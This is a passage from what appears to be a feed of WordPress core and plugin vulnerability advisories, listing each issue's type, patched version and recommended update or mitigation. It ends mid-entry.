Plugin: Donation Block For PayPal

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: FG PrestaShop to WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.20.0
Recommended Action: Update to version 3.20.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.1.18
Recommended Action: Update to version 7.1.18, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Ad Buttons

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Lana Email Logger

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Modal Dialog

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.5.10
Recommended Action: Update to version 3.5.10, or a newer patched version

Plugin: TI WooCommerce Wishlist

Vulnerability: Arbitrary Options Update
Patched Version: 1.21.12
Recommended Action: Update to version 1.21.12, or a newer patched version

Plugin: stats

Vulnerability: SQL Injection
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Missing Authorization in Reviews Exporter
Patched Version: 5.36.1
Recommended Action: Update to version 5.36.1, or a newer patched version

Plugin: TableOn – WordPress Posts Table Filterable

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: BestWebSoft's Twitter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.15
Recommended Action: Update to version 2.15, or a newer patched version

Plugin: Sponsors Carousel

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting in show
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Fields

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Crypto Converter ⚡ Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WatuPRO

Vulnerability: SQL Injection
Patched Version: 5.5.3.7
Recommended Action: Update to version 5.5.3.7, or a newer patched version

Plugin: Dynamic Pricing and Discount Rules for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: NextCellent Gallery – NextGEN Legacy

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dropbox Folder Share

Vulnerability: Unauthenticated Server-Side Request Forgery via ‘link’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Daily Prayer Time

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2021.08.10
Recommended Action: Update to version 2021.08.10, or a newer patched version

Plugin: WP Athletics

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Slider by Soliloquy – Responsive Image Slider for WordPress

Vulnerability: Missing Authorization
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: ResAds

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Catalyst Connect Zoho CRM Client Portal

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Arbitrary Redirect
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Super Testimonials

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: RD Order Modifier for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection via tutor_quiz_builder_get_answers_by_question
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: WP Basic Elements

Vulnerability: Missing Authorization to Plugin Settings Update via wpbe_save_settings
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: WooSwipe WooCommerce Gallery

Vulnerability: Missing Authorization
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Full Path Disclosure
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Netroics Blog Posts Grid

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Authenticated PHP Object Injection
Patched Version: 6.8.2
Recommended Action: Update to version 6.8.2, or a newer patched version

Plugin: Learning Courses

Vulnerability: Open Redirect
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: WP Job Portal – A Complete Recruitment System for Company or Job Board website

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.9.0
Recommended Action: Update to version 2.9.0, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.1.6
Recommended Action: Update to version 6.1.6, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via openai_settings_option_callback
Patched Version: 4.4.9
Recommended Action: Update to version 4.4.9, or a newer patched version

Plugin: Bookshelf

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Terms descriptions

Vulnerability: Reflected Cross-Site Scripting via term_search
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: WP Payeezy Pay

Vulnerability: Local File Inclusion
Patched Version: 2.98
Recommended Action: Update to version 2.98, or a newer patched version

Core: WordPress

Vulnerability: Server-Side Request Forgery #2
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.14, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: Post Meta Data Manager

Vulnerability: Missing Authorization to User, Term, and Post Meta Deletion
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.65
Recommended Action: Update to version 2.8.65, or a newer patched version

Plugin: Duplicate Post Page Menu & Custom Post Type

Vulnerability: Missing Authorization to Post Duplication
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: VRView

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Beta Tester

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Xhanch – My Twitter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Freshdesk (official)

Vulnerability: Open Redirect
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: WP-Property – WordPress Powered Real Estate and Property Management

Vulnerability: Remote File Upload
Patched Version: 1.35.1
Recommended Action: Update to version 1.35.1, or a newer patched version

Plugin: SmokeSignal

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting via post_meta
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Plugin: SpamReferrerBlock

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mail Masta

Vulnerability: SQL Injection via member_id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: No subtitle
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WeSecur Security – Antivirus, Malware Scanner and Protection for your WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: RokStories

Vulnerability: Arbitrary File Upload
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: Thank Me Later

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Missing Authorization
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: Responsive Column Widgets

Vulnerability: Reflected Cross-Site Scripting via tab
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Export Import Menus

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Order Delivery Date for WP e-Commerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Zero Spam for WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.4.5
Recommended Action: Update to version 5.4.5, or a newer patched version

Plugin: FoxyPress

Vulnerability: Arbitrary File Upload
Patched Version: 0.4.2.6
Recommended Action: Update to version 0.4.2.6, or a newer patched version

Plugin: Phoenix Media Rename

Vulnerability: Author Arbitrary Media File Renaming
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: Current Menu Item for Custom Post Types

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Dyslexiefont Free

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.16.18
Recommended Action: Update to version 4.16.18, or a newer patched version

Plugin: Private Files

Vulnerability: Cross-Site Request Forgery to Disable Protection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Content Slide

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery from files

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WooCommerce Product Add-ons

Vulnerability: Authenticated (Shop Manager+) PHP Object Injection
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: No External Links

Vulnerability: Cross-Site Scripting
Patched Version: 4.8.0
Recommended Action: Update to version 4.8.0, or a newer patched version

Plugin: RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Audio Merchant

Vulnerability: Cross-Site Request Forgery to Settings Modification and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Forums

Vulnerability: Directory Traversal
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: WP-Backgrounds Lite

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Member Approval

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kingkong Board

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Page Builder

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Evergreen Content Poster – Auto Post and Schedule Your Best Content to Social Media

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Hermit 音乐播放器

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.6.8
Recommended Action: Update to version 4.1.6.8, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Missing Authorization to Form Submission Export
Patched Version: 3.6.26
Recommended Action: Update to version 3.6.26, or a newer patched version

Plugin: WP Slider Plugin

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rough Chart

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Edit Comments

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EWWW Image Optimizer

Vulnerability: Sensitive Information Exposure
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Missing Authorization
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Privilege Escalation
Patched Version: 4.9.28
Recommended Action: Update to version 4.9.28, or a newer patched version

Plugin: Toolset Types – Custom Post Types, Custom Fields and Taxonomies

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.1.2
Recommended Action: Update to version 1.2.1.2, or a newer patched version

Core: WordPress

Vulnerability: Missing Authorization Checks
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: JetEngine

Vulnerability: Authenticated (Author+) Arbitrary File Upload to Remote Code Execution
Patched Version: 3.1.3.1
Recommended Action: Update to version 3.1.3.1, or a newer patched version

Plugin: Simple Link Directory

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 3.0.18
Recommended Action: Update to version 3.0.18, or a newer patched version

Plugin: Premium Courses & eLearning with Paid Memberships Pro for LearnDash, LifterLMS, Sensei LMS & TutorLMS

Vulnerability: SQL Injection
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: 6.6.4
Patched Version: 6.6.5
Recommended Action: Update to version 6.6.5, or a newer patched version

Plugin: Post Meta Data Manager

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Privilege Escalation
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Fluid Responsive Slideshow

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: WP Job Manager

Vulnerability: Arbitrary File Upload
Patched Version: 1.26.2
Recommended Action: Update to version 1.26.2, or a newer patched version

Plugin: Online Exam Software : eExamhall

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Print Invoice & Delivery Notes for WooCommerce

Vulnerability: Cross-Site Request Forgery via ts_reset_tracking_setting
Patched Version: 4.7.3
Recommended Action: Update to version 4.7.3, or a newer patched version

Plugin: Theme Editor

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Mediamatic – Media Library Folders

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Catalog Feed by PixelYourSite

Vulnerability: Reflected Cross-Site Scripting via ‘edit’
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Missing Capabilities Check to Information Disclosure
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Sensitive Information Disclosure
Patched Version: 7.6.3
Recommended Action: Update to version 7.6.3, or a newer patched version

Plugin: Permalink Manager Lite

Vulnerability: Missing Authorization
Patched Version: 2.2.20.1
Recommended Action: Update to version 2.2.20.1, or a newer patched version

Plugin: Affiliate Program Suite — SliceWP Affiliates

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.46
Recommended Action: Update to version 1.0.46, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Missing Authorization
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: barclaycart

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: WP Cloudy, weather plugin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: buddybadges

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: New Adman

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.11
Recommended Action: Update to version 2.9.11, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Cross-Site Scripting
Patched Version: .49
Recommended Action: Update to version .49, or a newer patched version

Plugin: Lightbox Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: PDF Viewer Block for Gutenberg

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Easy Digital Downloads – Product Reviews

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.10
Recommended Action: Update to version 1.3.10, or a newer patched version

Plugin: Continuous announcement scroller

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BackupBuddy

Vulnerability: Authentication Bypass
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated Sensitive Information Exposure via qcld_wb_chatbot_check_user
Patched Version: 4.9.1
Recommended Action: Update to version 4.9.1, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.2.8
Recommended Action: Update to version 6.4.2.8, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Insufficient Access Control on Multiple AJAX Actions
Patched Version: 6.10.23
Recommended Action: Update to version 6.10.23, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: SQL Injection
Patched Version: 1.9.8.1
Recommended Action: Update to version 1.9.8.1, or a newer patched version

Plugin: CURCY – Multi Currency for WooCommerce – The best free currency exchange plugin – Run smoothly on WooCommerce 8.x

Vulnerability: Missing Authorization
Patched Version: 2.1.18
Recommended Action: Update to version 2.1.18, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Double Opt-In for Download

Vulnerability: SQL Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Rezgo Online Booking

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: SQL Injection
Patched Version: 5.0.1.6
Recommended Action: Update to version 5.0.1.6, or a newer patched version

Plugin: Trade Runner

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: SimpleModal Contact Form (SMCF)

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: .htaccess Redirect

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Adaptive Images for WordPress

Vulnerability: Arbitrary File Deletion
Patched Version: 0.6.67
Recommended Action: Update to version 0.6.67, or a newer patched version

Plugin: WooCommerce – Product Importer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: SQL Injection
Patched Version: 2.6.6.0
Recommended Action: Update to version 2.6.6.0, or a newer patched version

Plugin: LaTeX for WordPress

Vulnerability: Cross-Site Request Forgery to Settings Update and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FCChat Widget

Vulnerability: Arbitrary File Upload
Patched Version: 2.2.13.7
Recommended Action: Update to version 2.2.13.7, or a newer patched version

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery to Staff Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Google Doc Embedder

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Materialis Companion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.3.40
Recommended Action: Update to version 1.3.40, or a newer patched version

Plugin: Images Optimize and Upload CF7

Vulnerability: Missing Authorization to Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multiple Page Generator Plugin – MPG

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 3.3.18
Recommended Action: Update to version 3.3.18, or a newer patched version

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: SQL Injection
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: WPBulky – WordPress Bulk Edit Post Types

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Inactive Logout

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WebLibrarian

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.8.6
Recommended Action: Update to version 3.4.8.6, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Core: WordPress

Vulnerability: Deserialization
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Authenticated SQL Injection
